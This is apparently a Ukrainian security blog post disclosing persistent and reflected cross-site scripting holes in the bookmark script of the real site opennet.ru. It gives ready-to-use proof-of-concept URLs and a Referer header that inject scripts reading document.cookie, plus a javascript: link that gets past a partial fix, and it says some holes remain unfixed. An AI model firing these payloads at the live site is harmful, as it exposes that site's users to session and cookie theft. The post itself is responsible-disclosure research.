14.06.2010
У листопаді, 05.11.2009, я знайшов Cross-Site Scripting уразливості (в тому числі persistent XSS) на секюріті проекті http://www.opennet.ru. Про що найближчим часом сповіщу адміністрацію проекту.
Раніше я вже писав про уразливості на opennet.ru.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
27.01.2011
XSS (persistent):
При доступі на сторінку http://www.opennet.ru /cgi-bin/opennet/bookmark.cgi?submit=add з заголовком:
Referer: http://www.opennet.ru/"><script>alert(document.cookie)</script>
Або через GET запит:
http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=http://www.opennet.ru/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&title=1&submit=%E4%CF%C2%C1%D7%C9%D4%D8
Сберігається “закладка” (для даного користувача). Код спрацьовує одразу, а також при заході на сторінку http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi.
Дані уразливості вже виправлені, але даний захист можна обійти використовуючи наступну Strictly social XSS:
Strictly social persistent XSS:
http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=javascript:alert(document.cookie)//http://opennet.ru&title=1&submit=%E4%CF%C2%C1%D7%C9%D4%D8
Сберігається “закладка” (для даного користувача). Код спрацьовує при кліку на сторінці http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi.
XSS:
http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?title=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
З даних уразливостей все ще не всі виправлені.